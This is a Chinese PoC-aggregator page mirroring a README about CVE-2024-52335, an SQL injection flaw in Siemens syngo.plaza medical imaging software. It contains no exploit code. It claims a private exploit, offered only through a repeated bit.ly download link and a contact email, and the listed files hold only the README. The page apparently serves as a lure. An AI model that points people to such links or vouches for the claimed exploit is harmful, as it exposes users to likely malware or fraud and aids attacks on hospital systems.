POC详情: 08e7b5aa2ff78d5d97290b2b2a998531d91c27dd

来源
关联漏洞
标题: Siemens Healthineers syngo 安全漏洞 (CVE-2024-52335)
描述:Siemens Healthineers syngo是德国西门子(Siemens)公司的一个用于医疗的通用成像软件。用于2D,3D 和 4D 读取和高级可视化。 Siemens Healthineers syngo存在安全漏洞,该漏洞源于在将输入数据发送到 SQL 服务器之前未对其进行正确清理。攻击者利用该漏洞执行恶意 SQL 命令,从而破坏整个数据库。
描述
CVE-2024-52335: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)
介绍
# CVE-2024-52335: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)

## Overview

A vulnerability has been identified in syngo.plaza VB30E (All versions < VB30E_HF05). The affected application does not properly sanitize input data before sending it to the SQL server. This could allow an attacker with access to the application to execute malicious SQL commands to compromise the whole database.


## Details
+ CVE ID: CVE-2024-52335
+ Published: 2024-12-06
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.3


## Exploit
**[Download Here](https://bit.ly/4inqYxQ)**


## Vulnerability Description

This vulnerability allows an attacker to execute arbitrary SQL commands on the database server. This leads to unauthorized access, data theft, data manipulation, and potential compromise of the entire database system.


## Usage
```
python3 exploit.py -h
```


## Affected Versions

**VB30E (All versions < VB30E_HF05)**


## Exploit
**[Download Here](https://bit.ly/4inqYxQ)**


## Contact
For inquiries, please contact cloudefence@thesecure.biz
文件快照

[4.0K] /data/pocs/08e7b5aa2ff78d5d97290b2b2a998531d91c27dd └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。